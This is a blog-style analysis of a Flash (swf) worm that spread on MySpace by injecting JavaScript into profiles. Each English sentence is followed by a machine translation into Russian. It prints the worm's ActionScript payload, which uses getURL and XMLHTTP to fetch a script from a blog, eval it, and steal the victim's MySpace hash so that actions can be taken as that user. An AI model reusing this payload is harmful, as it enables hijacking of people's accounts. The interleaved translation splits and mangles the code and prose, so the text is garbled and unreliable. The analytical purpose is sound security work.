MySpace has been infected by Flash based (swf) worm which spreading rapidly through MySpace. MySpace были заражены основе Flash (swf) червь который быстро распространяется через MySpace. It is embedding JavaScript code into users’ profiles that redirects visitors to a site claiming the US government was behind the 9/11 terrorist attacks, Symantec Это вложение JavaScript код на пользователей, профили, который перенаправляет посетителей на сайт утверждая, правительство США за 9 / 11 террористических нападений, Symantec warned предостерег Monday. Понедельник. However it may be just the tip of the iceberg. Однако он может быть лишь вершиной айсберга. Let’s take a look at how it works to understand how it can be easily modified to deliver much devastating payloads. Давайте посмотрим, как она работает, чтобы понять, каким он может быть легко изменена по оказанию столь разрушительные полезной нагрузки.

The unnamed worm isn’t malicious but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who views the .swf file. Неназванных червь не опасный, но Shockwave Flash (. Swf) файлов, содержащих полезную нагрузку встроенное JavaScript в профиль любого пользователя MySpace которые мнениями. Swf файла. This can easily replicate Это может легко воспроизвести Samy is my friend Сами является моим другом worm without breaking a sweat. Червь, не нарушая пота.

This javascript code would then be interpreted by any user who visited the site, allowing sensitive data to be stolen, such as a hash value required to carry out operations as a user, and performing operations on behalf of that users (without consent obviously). Этот код javascript затем будет интерпретироваться любым пользователем, которые посетили сайт, позволяющий чувствительных данных, которые будут украдены, как, например, хэш-значение, необходимых для проведения операций, как пользователя, так и проведение операций от имени этого движения (без его согласия, очевидно). Currently, that access is being used only to spread the JavaScript code to other profiles on the popular social network site. В настоящее время, что доступ в настоящее время используется только для распространения JavaScript код на другие обзоры популярной социальной сети.

If the payload is malicious, it can carry out secondary attacks like targeting recently discovered vulnerabilities affecting Microsoft Office content. Если полезная нагрузка является вредоносной, он может осуществлять нападения, как среднее ориентации недавно обнаруженных уязвимостей Microsoft Office, затрагивающих содержание. The impact would be much higher exposing even sensitive information on your hard-disk. Последствия будут гораздо выше, обнажая даже конфиденциальную информацию на жестком диске.

Let’s take a look at the worm, thanks to research by Давайте взглянем на червя, благодаря исследований kinematic.theory :

When you visited an already infected page, there is a Flash object embedded (”redirect.swf”) which contains the actionscript: Когда вы посетили уже зараженные страницы, имеется встроенный Flash объект ( "redirect.swf"), которая содержит actionscript:
getURL(" getURL ( " url url “); ");

It opens and redirects you to the specified blog URL. Он открывает и перенаправляет вас на указанный URL блога.

On this blog url there is another flash file embedded - “retrievecookie.swf”. Об этом Адрес блога есть еще один флэш-файла встроенного - "retrievecookie.swf". It contains: Она содержит:

getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\' getURL ( "javas \ n \ rcript: var = х новых ActiveXObject (\ 'Msxml2.XMLHTTP \'); x.open (\ 'GET \", \ "http://editprofile.myspace.com/index.cfm? fuseaction = user.HomeComments и friendID = 93634373 \ ', верно); x.onreadystatechange = функция () (если (x.readyState == 4) (var пг = x.responseText; var = pg.substring п / п (pg.indexOf (\ "BX-\ ') +3, pg.indexOf (\'-EX \ ')), а ((sc.indexOf (\'
\’)!=-1)||(sc.indexOf(\’-XXX\’)!=-1)){var n=sc.indexOf(\’ \')!=- 1) | | (sc.indexOf (\ '-XXX \')!=- 1)) (var n = sc.indexOf (\'
\’);if(n==-1)n=sc.indexOf(\’-XXX\’);sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};” + “eval(sc);}};” + “x.send(null);”, “”); \ '); Если (n ==- 1) № = sc.indexOf (\'-XXX \ '); sc.substring п / п = (0 Н) + sc.substring (n +5, sc.length); ); "+" Eval (ПК );}};" + "x.send (нулевой);", "");

It opens another blog post ( Это открывает еще один блога ( link ссылка ) and evaluates its contents. ) И оценивает ее содержание.

This code gets your MySpace hash which allows anyone to act as you on MySpace and perform any operations on your behalf like changing your password or adding someone unknown as your friend, anything you can do on MySpace. Этот код запускается на вашем MySpace хеширования, которая позволяет кому бы то ни было действия, как вы на MySpace и производить любые операции от своего имени, как изменить свой пароль или добавления кто-то неизвестный, как ваш друг, все, что вы можете делать на MySpace. Currently the code adds a message to your MySpace profile. В настоящее время код добавляет сообщения на Ваш MySpace профиля. It extensively use AJAX for its operations. Она широко использовать AJAX для своей деятельности.